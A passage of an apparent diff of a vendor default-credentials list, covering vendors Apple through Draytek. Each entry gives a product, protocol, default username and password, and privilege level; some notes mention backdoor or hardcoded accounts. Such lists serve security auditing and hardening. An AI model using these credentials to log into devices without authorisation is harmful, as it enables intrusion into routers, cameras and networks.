-Apple,airport5,1.0.09,Multi,root,admin,Admin,192.168.1.1 -Apple,iPhone,,,mobile,dottie,, -Apple,iPhone,,,root,alpine,Administrator, -Applied Innovations,AIscout,,Multi,scout,scout,supervisor, -Areca,RAID controllers,,Console,admin,0,Admin, -Areca,RAID controllers,Any,,admin,0,Administrator,http://ArecaIP:81 -Arecont Vision,IP Camera system,,HTTP,admin,,, -Arescom,modem/router,10XX,Telnet,,atc123,Admin, -Armenia,Forum,,Multi,admin,admin,Admin, -Arris,TG862,,admin,admin,password,admin, -Arris,Touchstone Gateway,,HTTP,admin,password,Administrator, -Arrowpoint,,,,,,, -Arrowpoint,,,,admin,system,Administrator, -Arrowpoint,any?,,,admin,system,, -Aruba,Mobility Controller,,,admin,admin,Administrator,then 'enable' and default password 'admin' -Asante,FM2008,,Multi,admin,asante,Admin, -Asante,FM2008,,Telnet,superuser,,Admin, -Asante,FM2008,01.06,Telnet,superuser,asante,Administrator, -Asante,IntraStack,,multi,IntraStack,Asante,Admin, -Asante,IntraSwitch,,Multi,IntraSwitch,Asante,Admin, -Asante,IntraSwitch,,multi,IntraSwitch,Asante,Admin, -Ascend,All TAOS models,all,,admin,Ascend,Admin, -Ascend,Router,,Telnet,,ascend,Admin, -Ascend,Router,,Telnet,,ascend,Administrator, -Ascend,Sahara,,Multi,root,ascend,, -Ascend,Yurie,,Multi,readonly,lucenttech2,, -Ascend,Yurie,,Multi,readonly,lucenttech2,Read, -Ascom,Ascotel PBX,,Multi,,3ascotel,Admin, -Ascom,Ascotel PBX,ALL,Multi,,3ascotel,Admin, -Ascom,Ascotel,,,,3ascotel,Administrator,https://pbxweb.aastra.com/extra/support/attachments/KnowledgeBase/00887/Ascotel_2050_with_AIP6400_.pdf -Asmax,Ar-804u,,HTTP,admin,epicrouter,Admin, -Aspect,ACD,6,HTTP,customer,,User, -Aspect,ACD,6,HTTP,customer,,User,views error logs -Aspect,ACD,6,Oracle,DTA,TJM,User, -Aspect,ACD,7,Oracle,DTA,TJM,User, -Aspect,ACD,8,Oracle,DTA,TJM,User, -Asus,520g,,,admin,admin,Administrator, -Asus,DSL-AC55U,ANY,HTTP,admin,admin,Administrator,Default IP: 192.168.1.1 -Asus,P5P800,,Multi,,admin,User, -Asus,RT-N16,,HTTP,admin,admin,Administrator, -Asus,RT-N56U,ANY,admin,admin,HTTP,Administrator, -Asus,TM-AC1900,3.0.0.4.376_3221,WPA2-Personal,admin,admin,Administrator, -Asus,WL-500G,,,admin,admin,Administrator, -Asus,WL-HDD2.5,,,admin,admin,Administrator,Default IP: 192.168.1.220 -Asus,WL500g Deluxe,,HTTP,admin,admin,Admin, -Asus,wl300,All,HTTP,admin,admin,Admin, -Asus,wl500,,HTTP,admin,admin,, -Asus,wl500,All,HTTP,admin,admin,Admin, -Asus,wl503g,All,HTTP,admin,admin,Admin, -Atlantis,A02-RA141,,Multi,admin,atlantis,Admin, -Atlantis,I-Storm Lan Router ADSL,,Multi,admin,atlantis,Admin, -Atlassian,Crowd,2.6.2,,Crowd,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Atlassian,Crowd,2.6.2,,Demo,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Atlassian,Crowd,2.6.2,,Username,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Atlassian,Crowd,2.6.2,,crowd-openid-server,password,,http://www.commandfive.com/papers/C5_TA_2013_3925_AtlassianCrowd.pdf -Attachmate,Attachmate Gateway,,Console,,PASSWORD,Admin, -Attachmate,Attachmate Gateway,,Console,,PASSWORD,Administrator, -Audioactive,MPEG Realtime Encoders,,Telnet,,telos,Admin, -Audioactive,MPEG Realtime Encoders,,Telnet,,telos,Administrator, -Autodesk,Autocad,,Multi,autocad,autocad,User, -Avaya,4602 SIP Telephone,1.1,HTTP,admin,barney,, -Avaya,CMS Supervisor,11,Console,root,cms500,Admin, -Avaya,Cajun Pxxx,,Multi,root,root,Admin, -Avaya,Cajun,P550R P580 P880 and P882,Multi,diag,danger,Developer, -Avaya,Cajun,P550R P580 P880 and P882,Multi,manuf,xxyyzz,Developer, -Avaya,Cajun,P550R P580 P880,Multi,diag,danger,Developer, -Avaya,Cajun,P550R P580 P880,Multi,manuf,xxyyzz,Developer, -Avaya,Cajun,P550R/P580/P880/P882,Multi,diag,danger,Developer, -Avaya,Cajun,P550R/P580/P880/P882,Telnet,,,Admin, -Avaya,Definity,,,dadmin,dadmin,Administrator, -Avaya,Definity,,Multi,dadmin,dadmin01,Admin, -Avaya,Definity,G3Si,Multi,craft,,Admin, -Avaya,Integrated Management Database (IMD),,,admin,admin123,Administrator, -Avaya,Intuity Audix,,,Craft,crftpw,, -Avaya,P330 Stackable Switch,,Telnet,root,root,Administrator, -Avaya,Pxxx,41761,Multi,diag,danger,Admin, -Avaya,Pxxx,41761,Multi,manuf,xxyyzz,Admin, -Avaya,Pxxx,5.2.14,Multi,manuf,xxyyzz,Admin, -Avaya,Pxxx,5/2/2014,Multi,diag,danger,Admin, -Avaya,Pxxx,5/2/2014,Multi,manuf,xxyyzz,Admin, -Avaya,Scopia Gateway,,HTTP,admin,password,Administrator,https://downloads.avaya.com/css/P8/documents/100181785 -Avaya,Scopia,,HTTP,admin,admin,Administrator,https://downloads.avaya.com/css/P8/documents/100173462 -Avaya,Winspm,,,,Craftr4,, -Avaya,definity,up to rev. 6,any,craft,crftpw,Admin, -Avaya,routers,,telnet,root,root,Administrator, -Avenger News System (ANS),ANS,,HTTP,,Administrative,,default string: admin:aaLR8vE.jjhss:root@127.0.0.1pass file is located at ans_data/ans.passwd (relative to ans.pl location) -Avigilon,IP Camera system,,HTTP,admin,admin,, -Avocent,Cyclade,Linux hostnamehere 2.6.11 #1Tue Mar 2813:31:20 PST 2006 ppc unknown,Multi,root,tslinux,Admin,http://www.cyclades.com.au -Avocent,Cyclade,Linux hostnamehere,Multi,root,tslinux,Admin,http://www.cyclades.com.au -Axent,NetProwler manager,WinNT,,administrator,admin,, -Axis Communications,Axis Network Camera,2120/2110/2100/200+/200,ftp,root,pass,Administrator, -Axis Communications,Axis Network Camera,2120/2110/2100/200+/200,http,root,pass,Administrator, -Axis Communications,Axis Network Camera,2120/2110/2100/200+/200,telnet,root,pass,Administrator, -Axis Communications,Printserver,540/540+,Multi,root,pass,Administrator, -Axis,540/542 Print Server,,Multi,root,pass,Admin, -Axis,All Axis Printserver,All,Multi,root,pass,Admin, -Axis,Camera Server,2100/2120/2420,,root,pass,Administrator, -Axis,IP Camera system,,HTTP,root,,, -Axis,NETCAM,200/240,,root,pass,, -Axis,NETCAM,200/240,Telnet,root,pass,Admin, -Axis,Printserver,540/540+,Multi,root,pass,Admin, -Axis,StorPoint CD E100,,,root,pass,Administrator, -Axis,StorPoint NAS 100,,,root,pass,Administrator, -Axis,Webcams,,HTTP,root,pass,Admin, -Axway,SecureTransport,,HTTP,setup,setup,,https://cdn.axway.com/u/documentation/secure_transport/5.3.0/SecureTransport_GettingStartedGuide_allOS_en.pdf -Aztecj,DSL 600EU,62.53.2,HTTP,isp,isp,Admin,backdoor - not in all f/w versions -Aztecj,DSL 600EU,62.53.2,Telnet,root,admin,Admin, -B-FOCuS,B-FOCuS 270/400,,,root,1234,admin, -BBR-4MG and BBR-4HG,Buffalo,ALL,HTTP,root,,Admin, -BBR-4MG and,BUFFALO,ALL,HTTP,root,,Admin, -BEA,WebLogic Process Integrator,2,,joe,password,User, -BEA,WebLogic Process Integrator,2,,system,security,Admin, -BEA,Weblogic,5.1,,system,weblogic,, -BMC Software,Patrol,all,BMC unique,Administrator,the same all over,Admin,this default user normally for ALL system in this area with one Password -BMC,Patrol,6,Multi,patrol,patrol,User, -BT,BT Mobile Hotspot,,HTTP,,admin,,https://btbusiness.custhelp.com/app/answers/detail/a_id/26793/~/how-do-i-change-passwords-or-reset-to-defaults-on-a-bt-mobile-hotspot%3F#reset -BUFFALO,WLAR-L11-L / WLAR-L11G-L,,HTTP,root,,Admin, -Basler,IP Camera system,,HTTP,admin,admin,, -Bausch Datacom,Proxima PRI ADSL PSTN Router4 Wireless,,Multi,admin,epicrouter,Admin, -Bausch Datacom,Proxima PRI ADSL PSTN,,Multi,admin,epicrouter,Admin, -Bay Networks,Router,,,User,,User, -Bay Networks,Router,,Telnet,Manager,,Admin, -Bay Networks,Router,,Telnet,User,,User, -Bay Networks,SuperStack II,,,security,security,Admin, -Bay Networks,SuperStack II,,Telnet,security,security,Admin, -Bay Networks,Switch,350T,,,NetICs,Admin, -Bay Networks,Switch,350T,Telnet,,NetICs,Admin, -Beck,IPC@Chip,,HTTP,anonymous,,User, -Beck,IPC@Chip,,HTTP,tel,,User, -Beetel,ADSL Modem,220X,Multi,admin,password,Admin,Beetel Model Provided By Airtel In India -Belkin,F5D6130,,SNMP,,MiniAP,Admin, -Belkin,F5D6130,,SNMP,,MiniAP,Admin,Wireless Acess Point IEEE802.11b -Belkin,F5D7150,FB,Multi,,admin,Admin, -Benq,awl 700 wireless router,1.3.6 Beta-002,Multi,admin,admin,Admin, -Billion,BIPAC-640 AC,640AE100,HTTP,,,Admin, -Billion,Bipac 5100,,HTTP,admin,admin,Admin, -BinTec,Bianca/Brick,XM-5.1,SNMP,,snmp,, -BinTec,Bianca/Brick,XM-5.1,SNMP,,snmp-Trap,read/write, -BinTec,x1200,37834,Multi,admin,bintec,, -BinTec,x1200,37834,Multi,admin,bintec,Admin, -BinTec,x2300i,37834,Multi,admin,bintec,, -BinTec,x2300i,37834,Multi,admin,bintec,Admin, -BinTec,x3200,37834,Multi,admin,bintec,, -BinTec,x3200,37834,Multi,admin,bintec,Admin, -Bintec,Bianka Routers,,Multi,admin,bintec,Admin, -Bintec,all Routers,Any,,admin,bintec,, -BioData,all Babylon Boxes,,,,Babylon,Admin, -Biostar,PC BIOS,,Console,,Q54arwms,Admin, -BizDesign,ImageFolio Pro,2.2,HTTP,Admin,ImageFolio,Admin, -Blue Coat Systems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface -Blue Coat Systems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface via ssh and web gui -Bluecoat,ProxySG (all model),SGOS 3 / SGOS4,HTTPS (8082),admin,admin,Admin, -Borland,Interbase,Any,,politcally,correct,Admin, -Borland/Inprise,Interbase,any,,SYSDBA,masterkey,, -Bosch Dinion,IP Camera system,,HTTP,admin,,, -Bosch,IP Camera system,,HTTP,service,service,, -Bosch,NWC-0455 Dinion IP Cameras,,,live,live,monitor - low priv, -Bosch,NWC-0455 Dinion IP Cameras,,,service,service,admin,may work in other bosch ipcameras -Bosch,NWC-0455 Dinion IP Cameras,,,user,user,regular user, -Boston,router simulator,3.66,HTTP,admin,admin,User, -Boston,router simulator,3.66,Multi,,admin,Admin, -BreezeCOM,,3.x,,,Master,, -BreezeCOM,Station Adapter and Access Point,4.x,,,Super,, -Breezecom,Breezecom Adapters,2.x,,,laflaf,, -Breezecom,Breezecom Adapters,2.x,,,laflaf,Admin, -Breezecom,Breezecom Adapters,3.x,,,Master,, -Breezecom,Breezecom Adapters,3.x,,,Master,Admin, -Breezecom,Breezecom Adapters,4.4.x,Console,,Helpdesk,Admin, -Breezecom,Breezecom Adapters,4.x,,,Super,, -Brickcom,IP Camera system,,HTTP,admin,admin,, -Broadlogic,XLT router,,HTTP,webadmin,webadmin,Admin, -Broadlogic,XLT router,,Telnet,admin,admin,Admin, -Broadlogic,XLT router,,Telnet,installer,installer,Admin, -Brocade,Fabric OS,,,factory,Fact4EMC,wipe?,I think this may wipe the device -Brocade,Fabric OS,,,root,Serv4EMC,root, -Brocade,Fabric OS,,Multi,admin,password,Admin,Gigabit SAN -Brocade,Fabric OS,5320,,user,password,user,Also on other SAN equipment -Brocade,Fabric OS,All,Multi,root,fivranne,Admin,Gigiabit SAN -Brocade,Fiberchannel Switches,,Multi,admin,password,Admin, -Brocade,Silkworm,all,Multi,admin,password,Admin,Also on other Fiberchannel switches -Brother,HL-1270n,,Multi,,access,network board access, -Brother,HL-1270n,,Telnet,,access,Admin, -Brother,HL-5250DN,ANY,admin,admin,access,Administrator, -Brother,HL-5350DN,ANY,admin,admin,access,Administrator, -Brother,HL5270DN,,HTTP,admin,access,Admin, -Brother,MFC-420CN,Firmware Ver.C,Multi,,access,Admin,multifunction printer copier -Brother,MFC-7225,,,admin,access,admin, -Brother,NC-2100p,,Multi,,access,Admin,NC-2100p Print Server -Brother,NC-3100h,,,,access,network board access, -Brother,NC-3100h,,Telnet,,access,Admin, -Brother,NC-4100h,,,,access,network board access, -Brother,NC-4100h,,Telnet,,access,Admin, -Buffalo Technology,TeraStation,,Multi,admin,password,Admin, -Buffalo,WHR-G300N,,,root,,Administrator, -Buffalo,Wireless Broadband Base Station-g,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1 -Buffalo,Wireless Broadband Base,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1 -Buffalo/MELCO,AirStation WLA-L11,,,root (cannot be changed),,Admin, -CBC Ganz,IP Camera system,,HTTP,admin,admin,, -CISCO,,,,pixadmin,pixadmin,, -CISCO,2600,,TELNET,Administrator,admin,admin, -CISCO,3600,,TELNET,Administrator,admin,admin, -CISCO,AIR-AP1231G-A-K9,,HTTP,Cisco,Cisco,Administrator,User/pass are case sensitive. -CISCO,CVA 122,,TELNET,admin,admin,admin, -CISCO,Cache Engine,,Console,admin,diamond,Admin, -CISCO,RTP300 W/2 PHONE PORTS,,HTTP,admin,admin,admin, -CISCO,RTP300 W/2 PHONE PORTS,,HTTP,user,tivonpw,, -CISCO,SF300,,HTTP,cisco,cisco,admin, -CNB,IP Camera system,,HTTP,root,admin,, -CNET,CNET 4PORT ADSL MODEM,,MULTI,admin,epicrouter,, -CNET,CNET 4PORT ADSL MODEM,CNAD NF400,Multi,admin,epicrouter,Admin, -CNET,CSH-2400W,unk,HTTP,admin,1234,Admin, -CNet,CWR- 500 Wireless-B Router,,,Admin,admin,Admin, -COM3,OLe,,HTTP,admin,admin,User, -CTC Union,ATU-R130,81001a,Multi,root,root,Admin, -Cable And Wireless,ADSL Modem/Router,,Multi,admin,1234,Admin, -Cabletron,Netgear modem/router and SSR,,,netman,,Admin, -Cabletron,Netgear modem/router,,,netman,,Admin, -Cabletron,any,any,,,,, -Cabletron/Enterasys,WebView for Matrix E1 (1G694-13 or 1G582-09 or 1H582-51) switch,,HTTP,,,Admin, -Calix,Residential Gateway,,,admin,admin,, -Calix,Router,,HTTP,admin,,, -Canonical Ltd.,Ubuntu,,,ubuntu,ubuntu,Admin, -Cassandra,CassandraDB,,Any,cassandra,cassandra,Admin, -Cayman,3220-H DSL Router,GatorSurf 5,,Any,,, -Cayman,Cayman DSL,,,,,Admin, -Celerity,Mediator,,Multi,root,Mau'dib,Admin, -Celerity,Mediator,,Multi,root,Mau’dib,Admin, -Celerity,Mediator,Multi,Multi,mediator,mediator,User, -Cellit,CCPro,,Multi,cellit,cellit,Admin, -Centreon,Web UI,18.10,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/18.10/installation/from_VM.html -Centreon,Web UI,19.04,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/19.04/installation/from_VM.html -Centreon,Web UI,19.10,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/19.10/installation/from_VM.html -Centreon,Web UI,2.8,HTTP,admin,centreon,,https://docs.centreon.com/docs/centreon/en/2.8/installation/from_VM.html -Checkpoint,SecurePlatform,NG FP3,Console,admin,admin,Admin, -CipherTrust,IronMail,Any,Multi,admin,password,Admin, -Cisco,1900,,Multi,,,Admin, -Cisco,2501,,Telnet,,,Admin, -Cisco,2503,,,,,, -Cisco,3600,,Telnet,,,Admin, -Cisco,AP1200,IOS,Multi,Cisco,Cisco,Admin,This is when you convert AP1200 or AP350 to IOS -Cisco,Aironet 1200,,HTTP,root,Cisco,Admin, -Cisco,Aironet,,Multi,,_Cisco,Admin, -Cisco,Aironet,,Multi,Cisco,Cisco,Admin, -Cisco,Any Router and Switch,10 - 12,,cisco,cisco,, -Cisco,BBSD MSDE Client,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,NULL,database,The BBSD Windows Client password will match the BBSD MSDE Client password -Cisco,BBSM Administrator,5.0 and 5.1,Multi,Administrator,changeme,Admin, -Cisco,BBSM MSDE Administrator,5.0 and 5.1,IP and Named Pipes,sa,,Admin, -Cisco,BBSM,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,changeme2,database,The BBSD Windows Client password will match the BBSD MSDE Client password -Cisco,CNR,All,CNR GUI,admin,changeme,Admin,This is the default password for Cisco Network Registrar -Cisco,Cache Engine,,Console,admin,diamond,Admin, -Cisco,CallManager,,HTTP,admin,admin,Admin,nabil ouchn -Cisco,Catalyst 4000/5000/6000,All,SNMP,,public/private/secret,RO/RW/RW+change SNMP config,default on All Cat switches running the native CatOS CLI software. -Cisco,Cisco Wireless Location Appliance,2700 Series prior to 2.1.34.0,Multi,root,password,Admin, -Cisco,CiscoWorks 2000,,,admin,cisco,Admin, -Cisco,CiscoWorks 2000,,,guest,,User, -Cisco,Ciso Aironet 1100 series,Rev. 01,HTTP,,Cisco,Admin, -Cisco,ConfigMaker,,,cmaker,cmaker,Admin, -Cisco,Content Engine,,Telnet,admin,default,Admin, -Cisco,HSE,,Multi,hsa,hsadb,Admin, -Cisco,HSE,,Multi,root,blender,Admin, -Cisco,Hot Standby Routing Protocol,,HSRP,,cisco,Admin, -Cisco,IOS,,Multi,,Cisco router,, -Cisco,IOS,,Multi,,cc,, -Cisco,IOS,,Multi,cisco,cisco,, -Cisco,IOS,,Multi,ripeop,(no pw),, -Cisco,IOS,,SNMP,private ReadWrite access,secret,Read/Write, -Cisco,IOS,12.1(3),SNMP,,cable-docsis,SNMP read-write, -Cisco,IOS,2600 series,Multi,,c,,but these are common misconfigurations -Cisco,MGX,,,superuser,superuser,Admin, -Cisco,MeetingPlace,,Console,technician,2 + last 4 of Audio Server chasis Serial case-sensitive+ 561384,Admin,Used for Audio Server or MeetingTime software -Cisco,Netranger/secure IDS,,Multi,netrangr,attack,, -Cisco,Netranger/secure IDS,3.0(5)S17,Multi,root,attack,Admin,must be changed at the first connection -Cisco,Network Registar,3.0,,ADMIN,changeme,Admin, -Cisco,ONS,all,Multi,CISCO15,otbu+1,Admin,Optical Network System - http/TL1 -Cisco,PIX firewall,,Multi,,,Admin, -Cisco,PIX firewall,,Telnet,,cisco,User, -Cisco,PIX,6.3,Console,enable,,Admin, -Cisco,RV130,,,cisco,cisco,admin, -Cisco,Router,1,Multi,,,Admin, -Cisco,VPN 3000 Concentrator,,,admin,admin,, -Cisco,VPN Concentrator 3000 series,3,Multi,admin,admin,Admin, -Cisco,WLSE,,Multi,root,blender,Admin, -Cisco,WLSE,,Multi,wlse,wlsedb,Admin, -Cisco,WLSE,all,Console,enable,,enable,use with wlseuser -Cisco,WSLE,all,all,wlseuser,wlsepassword,User,see also enable passwd -Cisco,aironet,,Multi,,,Admin, -Cisco,pix,,Multi,,,Admin, -Cisco-Arrowpoint,Arrowpoint,,,admin,system,Admin, -Citel,Handset Gateway,,HTTP,citel,password,Admin, -Citel,Handset Gateway,,Telnet,,citel,Admin, -Cobalt,RaQ * Qube*,Any,,admin,admin,, -Colubris,MSC,,HTTP,admin,admin,User,for all Colubris Devices -Com21,General Equipment(?),,,,,Admin, -Comcast Home Networking,Comcast Home Networking,ALL,HTTP,comcast,,Admin, -Comersus,Shopping Cart,3.2,HTTP,admin,dmr99,Admin, -Compaq,Armada E500,pp2060,Multi,Administrator,admin,Admin, -Compaq,Armada M700,,Console,Administrator,admin,Guest, -Compaq,Insight Manager,,,PFCUser,240653C9467E45,User, -Compaq,Insight Manager,,,administrator,administrator,Admin, -Compaq,Insight Manager,,,anonymous,,User, -Compaq,Insight Manager,,,operator,operator,, -Compaq,Insight Manager,,,user,public,User, -Compaq,Insight Manager,,,user,user,User, -Compaq,Insight Manager,,Multi,,,Admin, -Compaq,Management Agents,All,,administrator,,Admin, -Compaq,PC BIOS,,Console,,Compaq,Admin, -Compaq,dc770t,,Multi,,,Admin, -Compualynx,Cmail Server,Any,Multi,administrator,asecret,Admin, -Compualynx,SCM,Any,Multi,administrator,asecret,Admin, -Comtrend,ct-536+,,HTTP,admin,1234,Admin, -Comtrend,ct-536+,,HTTP,admin,admin,Admin, -Conceptronic,C54BRS4,,Multi,admin,1234,Admin,Its a Generic Router From Conceptronic - Probably they can be all the same -Concord,PC BIOS,,,,last,Admin, -Conexant,Router,,HTTP,,admin,Admin,yes -Conexant,Router,,HTTP,,epicrouter,Admin, -Corecess,6808 APC,,Telnet,corecess,corecess,User, -Corecess,Corecess 3112,,HTTP,Administrator,admin,Admin, -Costar,IP Camera system,,HTTP,root,root,, -Coyote-Point,Equaliser 4,Free BSD,Serial,eqadmin,equalizer,Admin, -Coyote-Point,Equaliser 4,Free BSD,Serial,root,,Admin, -Crossbeam,COS/XOS,,Lilo boot,,x40rocks,Admin,At the LILO boot prompt type linux single -Crystalview,OutsideView 32,,,,Crystal,Admin, -CyberMax,PC BIOS,,Console,,Congress,Admin, -CyberPower,Remote Management Card RMCARD302,ANY,HTTP,cyber,cyber,Administrator,https://cdn.cnetcontent.com/25/1e/251e4f4c-b12e-4d32-860a-491a9bc5059a.pdf -CyberPower,Remote Management Card RMCARD302,ANY,HTTP,device,cyber,Viewer,https://cdn.cnetcontent.com/25/1e/251e4f4c-b12e-4d32-860a-491a9bc5059a.pdf -Cyberguard,all firewalls,all,console + passport1,cgadmin,cgadmin,Admin, -Cyclades,Cyclades-TS800,TS800,telnet/ssh/ web,root,,Admin, -Cyclades,MP/RT,,,super,surt,Admin, -Cyclades,PR 1000,,Telnet,super,surt,Admin,mpacheco.inimigo.com -Cyclades,TS800,,HTTP,root,tslinux,Admin,mpacheco.inimigo.com -D-LINK,DSL-G664T,A1,HTTP,admin,admin,Admin,SSID : G664T_WIRELESS -D-Link,AC1200,,HTTP,admin,admin,, -D-Link,AC1740,,HTTP,admin,admin,, -D-Link,AC1750,,HTTP,admin,1234,, -D-Link,Cable/DSL Routers/Switches,,Multi,,admin,Admin, -D-Link,D-704P,,Multi,admin,admin,Admin, -D-Link,D-704P,rev b,Multi,admin,,Admin, -D-Link,DCM-604,,HTTP,admin,password,, -D-Link,DFE-538TX 10/100 Adapter,,,,,Admin, -D-Link,DFL-300,,DHCP,admin,admin,Administrator,https://www.manualslib.com/manual/356725/D-Link-Dfl-300.html#manual -D-Link,DGN2200M,,HTTP,admin,dareadsl,, -D-Link,DI-101,,,,meet,123456mj, -D-Link,DI-104,,,,admin,patel, -D-Link,DI-106 ISDN router,,,,1234,Admin, -D-Link,DI-514,,Multi,user,,Admin, -D-Link,DI-524,E1,Telnet,Alphanetworks,wrgg15_di524,Admin,Password is actually firmware image signature. (use hex editor on .bin) -D-Link,DI-524,all,HTTP,admin,,Admin,http://192.168.0.1 -D-Link,DI-524,all,HTTP,user,,User, -D-Link,DI-604,1.62b+,HTTP,admin,,Admin, -D-Link,DI-604,1.8,Multi,admin,,Admin, -D-Link,DI-604,2.02,HTTP,admin,admin,Admin, -D-Link,DI-604,rev a rev b rev c rev e,Multi,admin,,Admin,http://192.168.0.1 -D-Link,DI-614+,,HTTP,admin,admin,Admin, -D-Link,DI-614+,,HTTP,user,,User, -D-Link,DI-614+,any,HTTP,admin,,Admin, -D-Link,DI-624+,A3,HTTP,admin,admin,Admin, -D-Link,DI-624,all,HTTP,User,,Admin, -D-Link,DI-624,all,HTTP,admin,,Admin, -D-Link,DI-634M,,Multi,admin,,Admin, -D-Link,DI-701,,Multi,,year2000,Admin, -D-Link,DI-704,,,,admin,Admin, -D-Link,DI-704,,Multi,,admin,Admin, -D-Link,DI-704,rev a,Multi,,admin,Admin,Cable/DSL Routers/Switches -D-Link,DI-804,v2.03,Multi,admin,,Admin, -D-Link,DIR-650IN,,HTTP,admin,admin,admin, -D-Link,DSA-31003,,,admin,admin,admin, -D-Link,DSA-51003,,,admin,admin,admin, -D-Link,DSL-2750U,ADSL2/2+,,admin,admin,Administrator,https://www.dlinkmea.com/partner/media/product_item_downloadables/9146-DSL-2750U_C1_Manual_v1.00(ET).pdf -D-Link,DSL-300g+,Teo,HTTP,admin,admin,Admin, -D-Link,DSL-302G,,Multi,admin,admin,Admin, -D-Link,DSL-500,,Multi,admin,admin,, -D-Link,DSR-1000,,,admin,admin,admin, -D-Link,DWL 1000,,HTTP,admin,,Admin, -D-Link,DWL 2100AP,,Multi,admin,,Admin, -D-Link,DWL 900AP,,Multi,,public,Admin, -D-Link,DWL 900AP,,Multi,admin,public,Admin, -D-Link,DWL-2000AP+,1.13,HTTP,admin,,Admin,Wireless Access Point -D-Link,DWL-614+,2.03,HTTP,admin,,Admin, -D-Link,DWL-614+,rev a rev b,HTTP,admin,,Admin,http://192.168.0.1 -D-Link,DWL-900+,,HTTP,admin,,Admin, -D-Link,DWL-G730AP,1.1,HTTP,admin,,Admin,http://192.168.0.30 -D-Link,Dl 604,1.8,Multi,admin,,Admin, -D-Link,Dsl-300g+,Teo,Telnet,,private,Admin, -D-Link,G624T,,Multi,admin,admin,Admin, -D-Link,WBR-1310,B-1,Multi,admin,,Admin, -D-Link,firewall,dfl-200,HTTP,admin,admin,Admin, -D-Link,hubs/switches,,Telnet,D-Link,D-Link,, -D-link,504g adsl router,,HTTP,admin,admin,Admin,from product doco -D-link,DSL-504T,,HTTP,admin,admin,Admin, -D-link,DSL-G604T,,Multi,admin,admin,Admin, -D-link,DSL500G,,Multi,admin,admin,Admin, -D-link,DWL-900AP+,rev a rev b rev c,HTTP,admin,,Admin,http://192.168.0.50 -D-link,Di-707p router,,HTTP,admin,,Admin, -D-link,ads500g,,HTTP,admin,admin,Admin, -D9287ar,Pavilion6640c,,,Clarissa,,, -DELL,REMOTE ACCESS CARD,,HTTP,root,calvin,, -DI624,D-LINK,C3,HTTP,admin,password,Admin,hardcoded for Verizon FiOS -DIGICOM,Michelangelo Wave108,,HTTP,root,admin,Admin, -DLINK,604,,Multi,,admin,Admin, -DLink,DI-206 ISDN router,1.*,,Admin,Admin,, -DVTel,IP Camera system,,HTTP,Admin,1234,, -DZS - DASAN Zhone,ZNID-GPON-2426A-EU,S3.1.330,HTTP,user,user,,just for checking and tests -Daewoo,PC BIOS,,Console,,Daewuu,Admin, -Dahua,IP Camera system,,HTTP,admin,admin,, -Dallas Semiconductors,TINI embedded JAVA Module,<= 1.0,Telnet,root,tini,Admin, -Datacom,BSASX/101,,,,letmein,Admin, -Datawizard.net,FTPXQ server,,FTP,anonymous,any@,read/write on c:, -Davolink,DV2020,,HTTP,user,user,unknown, -Davox,Unison,,Multi,admin,admin,User, -Davox,Unison,,Multi,davox,davox,User, -Davox,Unison,,Multi,root,davox,Admin, -Davox,Unison,,Sybase,sa,,Admin, -Daytek,PC BIOS,,Console,,Daytec,Admin, -Debian,Linux LILO Default,2.2,Console,,tatercounter2000,Admin, -Deerfield,MDaemon,,HTTP,MDaemon,MServer,Admin, -Deerfield,MDaemon,,HTTP,MDaemon,MServer,Admin,web interface to manage MDaemon. fixed June 2002 -Dell,2161DS Console Switch,,HTTP,Admin,,Admin,case sensitive username -Dell,CSr500xt,,Multi,,admin,Admin, -Dell,LATITUDE,D35B,Multi,,,Admin, -Dell,Laser Printer 3000cn / 3100cn,,HTTP,admin,password,Admin, -Dell,Latitude,Bios D35B,Multi,,1RRWTTOOI,Admin, -Dell,PC BIOS,,Console,,Dell,Admin, -Dell,PowerApp Web 100 Linux,RedHat 6.2,HTTP,root,powerapp,Admin, -Dell,PowerConnect 2724,,HTTP,admin,,Admin, -Dell,PowerVault 50F,WindRiver,,root,calvin,, -Dell,Remote Access Card,,HTTP,root,calvin,Admin, -Dell,TrueMobile 1184 Wireless Broadband Gateway Router,unknown,HTTP,admin,admin,Admin, -Dell,WRTA-108GD,,,admin,admin,Admin,192.168.2.1 -Dell,bios,d35b,Multi,,,Admin, -Dell,c600,595b,Multi,,,User, -Dell,cpx h500gt,,Multi,,,Admin, -Dell,dell latitude cpx,,Multi,admin,admin,User, -Dell,latitude c610,a07,Multi,admin,admin,Admin, -Dell,notebook,,Multi,,,Admin, -Demarc,Network Monitor,,multi,admin,my_DEMARC,Admin, -Deutsch Telekomm,T-Sinus 130 DSL,,HTTP,,0,Admin, -Deutsche Telekom,T-Sinus 1054 DSL,All,HTTP,,0,Admin, -Deutsche Telekom,T-Sinus 154 DSL,13.9.38,HTTP,,0,Admin, -Deutsche Telekom,T-Sinus DSL 130,,HTTP,admin,,Admin,Usuallay also a WirelessLan AP -Develcon,Orbitor Default Console,,,,BRIDGE,Admin, -Develcon,Orbitor Default Console,,,,password,Admin, -Dictaphone,ProLog,,,NETOP,,, -Dictaphone,ProLog,,,NETWORK,NETWORK,, -Dictaphone,ProLog,,,PBX,PBX,, -Digiboard,Portserver 8 & 16,any,,root,dbps,Admin, -Digicom,Michelangelo,,Multi,admin,michelangelo,Admin, -Digicom,Michelangelo,,Multi,user,password,User, -Digicorp,Router,,,,BRIDGE,Admin, -Digicorp,Router,,,,password,Admin, -Digicorp,Viper,,Telnet,,BRIDGE,Admin, -Digicorp,Viper,,Telnet,,password,Admin, -Digital,DEC-10,,Multi,2,maintain,Admin, -Dlink,DFE-538TX 10/100 Adapter,Windows 98,,,,, -Dlink,DSL-500,,Multi,admin,admin,Admin, -Dlink,Dl-106 ISDN router,,,,1234,, -Draytek,Vigor 2600,,HTTP,admin,,Admin, -Draytek,Vigor 2900+,,HTTP,admin,admin,Admin, -Draytek,Vigor,all,HTTP,admin,admin,Admin, -Draytek,Vigor3300 